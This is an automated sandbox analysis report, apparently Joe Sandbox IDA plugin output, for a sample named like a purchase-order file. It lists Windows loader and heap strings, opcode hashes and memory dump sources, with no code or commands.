                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • HEAP: , xrefs: 014E3264
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014E327D
                                                      • HEAP[%wZ]: , xrefs: 014E3255
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $@
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      Strings
                                                      • LdrpCheckModule, xrefs: 0153A117
                                                      • Failed to allocated memory for shimmed module list, xrefs: 0153A10F
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0153A121
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                      Strings
                                                      • Failed to reallocate the system dirs string !, xrefs: 015482D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 015482DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 015482E8
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0158C1C5
                                                      • PreferredUILanguages, xrefs: 0158C212
                                                      • @, xrefs: 0158C1F1
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      Strings
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01554888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01554899
                                                      • LdrpCheckRedirection, xrefs: 0155488F
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      Strings
                                                      • LdrpInitializationFailure, xrefs: 015520FA
                                                      • Process initialization failed with status 0x%08lx, xrefs: 015520F3
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01552104
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      Strings
                                                      • LdrResSearchResource Enter, xrefs: 014DAA13
                                                      • LdrResSearchResource Exit, xrefs: 014DAA25
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      Strings
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      Strings
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014D063D
                                                      • kLsE, xrefs: 014D0540
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 014DA2FB
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 014DA309
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      Strings
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: bea10998b624e9812b21bbc6fd4ae4fbf696c75ef8c441f1a32720ec9acd424c
                                                      • Instruction ID: 531569b949c7962508a47420dc17d5138cae141484620f91c17cd4bd22d776bd
                                                      • Opcode Fuzzy Hash: bea10998b624e9812b21bbc6fd4ae4fbf696c75ef8c441f1a32720ec9acd424c
                                                      • Instruction Fuzzy Hash: 28918371900606BFDB22AFA5EC46FAFBBB9FF95750F100069F505AB260D774A901CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0155895E
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32c1458cae66cc231cc74dda2d69b63235d89cad01efc79151d143275c2f4f4a
                                                      • Instruction ID: 31fd42b21e8f851f48e7e0ec059f030097cdf4a03f8a6c55dd83f1b73240268d
                                                      • Opcode Fuzzy Hash: 32c1458cae66cc231cc74dda2d69b63235d89cad01efc79151d143275c2f4f4a
                                                      • Instruction Fuzzy Hash: 0C915572A00616CFEB24DB99C448B7EBBE1FF94716F05416AE905AF3A0E774D902C750
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1db0299b6ee77cbd51d283202acb67b0d53315b9b525c746bc67d7af8bfb0bd6
                                                      • Instruction ID: 73ad745f8965df0ceea7c9b345ba2f945126fea3e3845b536b2237faa5547c65
                                                      • Opcode Fuzzy Hash: 1db0299b6ee77cbd51d283202acb67b0d53315b9b525c746bc67d7af8bfb0bd6
                                                      • Instruction Fuzzy Hash: 8281A872E0062A9FDB14CF69C540ABEBBF5FB49700F14452EE845EB680E334D940CB94
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                      • Instruction ID: e43befd4090ff83689a1ff04ec05f8c4b0b71afa6be6e35ec827400b946e9815
                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                      • Instruction Fuzzy Hash: 4A818172A0025A9FDF19CF99C480AAEBBF6FF84310F188569E9169F385D734E901CB51
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2848ca239ae28f30e1b94aaadd2d671c96856a192a96058100804b421d2225ec
                                                      • Instruction ID: d7da9b6bfb26cc8689fb7b4fb5c925cd641905c213258da972b299c2db8ebd12
                                                      • Opcode Fuzzy Hash: 2848ca239ae28f30e1b94aaadd2d671c96856a192a96058100804b421d2225ec
                                                      • Instruction Fuzzy Hash: 76814471900609EFDB26CFA9C881BDEBBF9FF88354F144829E555AB250D770AC45CB60
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c246427ed0e9971b5b3197b475a2f61d184439ba14d3afe3b8dae6fc0741e3d8
                                                      • Instruction ID: 3571d435118ce68f3575c1ab36335a9157379e44d59f7a9f314289b817864103
                                                      • Opcode Fuzzy Hash: c246427ed0e9971b5b3197b475a2f61d184439ba14d3afe3b8dae6fc0741e3d8
                                                      • Instruction Fuzzy Hash: 5B71CE75D006669FCB2A8F59C4947FEBBF0FF98710F15461AE952AB360D3309805CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9d5116f7c86e7abd1360e1656af73175ea945c11b0d525754b3cfb375bbfbe9
                                                      • Instruction ID: 70622716ef5f362944d9668fa783d6f4f1eacd98c60413c8ac211c7d0ab218a2
                                                      • Opcode Fuzzy Hash: d9d5116f7c86e7abd1360e1656af73175ea945c11b0d525754b3cfb375bbfbe9
                                                      • Instruction Fuzzy Hash: 9C718E70900606EFDB20EF99D944A9EFBF9FF94700F12815AEA10AF358D7B18A44DB54
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 593585837946b2297e8b43e1fb8054b11174ef3b8b3febefbab6eb6b5e8b8ad0
                                                      • Instruction ID: 5a497a56421d589139e95d3e15eb0593248d798949a39e6e71ef3e4f614d2754
                                                      • Opcode Fuzzy Hash: 593585837946b2297e8b43e1fb8054b11174ef3b8b3febefbab6eb6b5e8b8ad0
                                                      • Instruction Fuzzy Hash: 4D7103756042429FD312DF28C484F2AB7E9FF84311F0485AAE898CB361DBB4DC46CB91
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                      • Instruction ID: 6794164196d9ef4428f75d063c10133614df2c35cf4b6046d90fd55c1a9b5f90
                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                      • Instruction Fuzzy Hash: 7171727190061AEFDB11DFA9C994EDEBBF8FF94704F10456AE905AB290DB30EA41CB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 508f49babace33c7d5c883c68c34f5c83a2bc8aa7d4afe1b104627c6544489d8
                                                      • Instruction ID: 45515acbc952ce140d908a897e6e4549ac31d14e1a3b8366e797ed724a359166
                                                      • Opcode Fuzzy Hash: 508f49babace33c7d5c883c68c34f5c83a2bc8aa7d4afe1b104627c6544489d8
                                                      • Instruction Fuzzy Hash: 4C71D532200702AFE732DF18C894F5ABBEAFF44761F154918E6568F2A1D775E944CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 519f23b29c7a09d1b4929ff2a8a86ea308165a0fd89ba5f060c67473d81a4119
                                                      • Instruction ID: 0d9f7e57200c9819e21f0954538a44c6ec5c2d0555ca0a107550e2f65182c2d8
                                                      • Opcode Fuzzy Hash: 519f23b29c7a09d1b4929ff2a8a86ea308165a0fd89ba5f060c67473d81a4119
                                                      • Instruction Fuzzy Hash: 52819F72A047168FDB25CF98D8A4BAEB7B1BF88310F16412EE910AF395C7749D41CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4c7565c4df7d8e88d1b4497a6c968974a78724952ba3ffc7f26905575fbdf41
                                                      • Instruction ID: 46b559e7839b51bf6b8671ec02c66b32a5efeef090680614fdeefe10f424c44a
                                                      • Opcode Fuzzy Hash: b4c7565c4df7d8e88d1b4497a6c968974a78724952ba3ffc7f26905575fbdf41
                                                      • Instruction Fuzzy Hash: D551A172505712AFDB12EE68C844E5BBBE8FBC5750F01492ABA40EF160E770ED05C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 437004e753d2e86e7fdd8d61da680c3bcb824e8108354af4be5db493257f88e4
                                                      • Instruction ID: 02eb0d68cc2624b7157ad0d6cb54da655d830e701a26b19980e91d339d8cb6b2
                                                      • Opcode Fuzzy Hash: 437004e753d2e86e7fdd8d61da680c3bcb824e8108354af4be5db493257f88e4
                                                      • Instruction Fuzzy Hash: CF51C170900706DFD721CF6AD889A6BFBF9BF94714F104A1ED2925B6A0C7B0A545CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8715ca26fdb4198b91bc70e68b43a16b3773cbbd538b5a0896001935f2587005
                                                      • Instruction ID: 01a88b58378a17bb7438e9d0431e8ad72fb97fe07ef28b2a35758b4019b1b50d
                                                      • Opcode Fuzzy Hash: 8715ca26fdb4198b91bc70e68b43a16b3773cbbd538b5a0896001935f2587005
                                                      • Instruction Fuzzy Hash: DB518F71200A05DFDB23EFA9C985E6AB3F9FF58744F51086EE5428B2A0D734E950CB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c616abe1f483925c03df36b166a916ddba7f698b1964d399e35e982d5f6851f
                                                      • Instruction ID: 01a4b6483b8e47e3c6ec1fa037962820f752b386b24256f6ca6c3f77fbc2b276
                                                      • Opcode Fuzzy Hash: 4c616abe1f483925c03df36b166a916ddba7f698b1964d399e35e982d5f6851f
                                                      • Instruction Fuzzy Hash: A05167716083028FD750DF29E882A6FBBE5BFD8218F44492EF589CB250EB30D945CB52
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction ID: 18ba994b388f12280f080579a88253e927f6c7535e30bd6933047789bb7eb514
                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction Fuzzy Hash: F0517C75E0021AABDF15DF98C440BAFBBF5AF45354F08406EEA01AB360DB34DA45CBA4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction ID: 98239632aedf0f43d9f91f5df672e8e1aa8de7f65467f553526f584441dbddca
                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction Fuzzy Hash: 3151B671D0020AABEF519E94C8A6BAEFBB5FB40325F114667DD126F190D7709F4187A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e8ec89bc7eca867c5758446c25a233898a6c92df0abfc259b31a313b71b5775
                                                      • Instruction ID: 4ff1f5da7ec0fbbacb5382eca80dbd7bedc5a45a85f4ecec128226775b324f32
                                                      • Opcode Fuzzy Hash: 3e8ec89bc7eca867c5758446c25a233898a6c92df0abfc259b31a313b71b5775
                                                      • Instruction Fuzzy Hash: C941D77170164A9BDF25DB2DC894F7FBB9BFF92220F084519E9158F281D734D801C692
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b96aa02e2eedea60b82b93a8fcf50719e5d9284b0998cd8e0f73bbcb84aa7515
                                                      • Instruction ID: 47e63327b5190bbf62c615e2f158d680a7140af53476336bd8418567f1579da0
                                                      • Opcode Fuzzy Hash: b96aa02e2eedea60b82b93a8fcf50719e5d9284b0998cd8e0f73bbcb84aa7515
                                                      • Instruction Fuzzy Hash: 1E518C72900316DFCB60DFA9C9909AEBBF9FF58358B11451AD956AB300DB70AA41CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ade32e400a2574c7d891ddec6c235513b9d6a9d20815c103b6ad089c7d2865d
                                                      • Instruction ID: 5537de3a36690ec544acf6eeee52adc8a410bda8c05fec940b79438f2b347baf
                                                      • Opcode Fuzzy Hash: 2ade32e400a2574c7d891ddec6c235513b9d6a9d20815c103b6ad089c7d2865d
                                                      • Instruction Fuzzy Hash: D44124726407029FDB27EFA99881F6E77AAFB95708F02042DED529F281D7B2D8048751
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction ID: ffadf41992873d709272866f5a3020a65ff3e0c03feda0a9bd3a569ffe2b8d44
                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction Fuzzy Hash: 9B41E7316017169FDF25CF68C984A6EB7E9FF90214B05462EE9128F640EB74ED04C7E2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f75ef20d251ed953e1134f67de229643b11658263bc7247008de5959487b3658
                                                      • Instruction ID: 9bf617e717736eb42939ebb2fbd398b06e48b27c9de79505693761fb1e058942
                                                      • Opcode Fuzzy Hash: f75ef20d251ed953e1134f67de229643b11658263bc7247008de5959487b3658
                                                      • Instruction Fuzzy Hash: AB41C932A0021A9BDB12DFD8C440BEEBBB4BF88750F14816AF905EB2C0D7359C41CBA4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a510b05102c057099465379d6ceeb2927e5a3ffd96157f8f99e0a2ef4c28820
                                                      • Instruction ID: 07299e118de0c5209aff31a04d114d75f2f152431aac8b47b902150ce8148bf0
                                                      • Opcode Fuzzy Hash: 6a510b05102c057099465379d6ceeb2927e5a3ffd96157f8f99e0a2ef4c28820
                                                      • Instruction Fuzzy Hash: 2B41B1716003029FD721DF29C888A2BB7E9FF94215F01482FE656D7731DB71E8458B51
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction ID: e9a28d5cbc6ba7c54e961705f1528aaacba23643d58389bd131d02cfb5a88c17
                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction Fuzzy Hash: D6517B75A40215CFDB55CF98C480AAEF7F2FF84714F2481A9D916AB355E730AE42CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c46571baad8e5101ed166e72ad6b7222e4c8ea51759a82f39826cf097e730b1
                                                      • Instruction ID: 9723a6c696fd360987040cf7bfe2e762b26165babca4657c14371604dc9654b8
                                                      • Opcode Fuzzy Hash: 8c46571baad8e5101ed166e72ad6b7222e4c8ea51759a82f39826cf097e730b1
                                                      • Instruction Fuzzy Hash: DA317A716097028FE760CF19C850B2BFBE5FB98B00F55496EE9849B361D770E848CB91
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction ID: ace7c7e07c9cecaa9432adb6e88b005858c614f5c96fe0a537f74ec64823b4af
                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction Fuzzy Hash: FA313072B00701AFE765CF6DCD40B5BBBF8BF58654F14492DA55AC7691E630E900CB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0f28a15e38cdc2421c09a4cd6693c01f74fe909b590f1dca855a21cfb14a7d9
                                                      • Instruction ID: 199e8c2b42bf349c1d170386ed7e72695fd0114295f8c4405cfc975bbe3ebd9e
                                                      • Opcode Fuzzy Hash: c0f28a15e38cdc2421c09a4cd6693c01f74fe909b590f1dca855a21cfb14a7d9
                                                      • Instruction Fuzzy Hash: 5C31CDB5505301CFC721DF19E54685ABBF9FF99614F0589AEE488AF321D330DA44CB92
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d228cd8bc8d52db77ea484f10f34ae1d11e7f4ae1dd5ca486a28940b1e6bdd33
                                                      • Instruction ID: 9af3ba2bff39fb7f094e74fd662a2626af681b95792a2c2ea2647aba03cb7486
                                                      • Opcode Fuzzy Hash: d228cd8bc8d52db77ea484f10f34ae1d11e7f4ae1dd5ca486a28940b1e6bdd33
                                                      • Instruction Fuzzy Hash: A831A131B006059FD720DFA9C980A6FB7F9BB94304F04852ED245E7765DB30DA45CB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                      • Instruction ID: f6001016214773b149139ef9f7d003210eb6c0935325adcb8f8f26b6c1c08a6b
                                                      • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                      • Instruction Fuzzy Hash: 3321093BE0025AAAD711DBB9C840BAFFBB5AF25740F05843ADE55EB350E270C90087A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
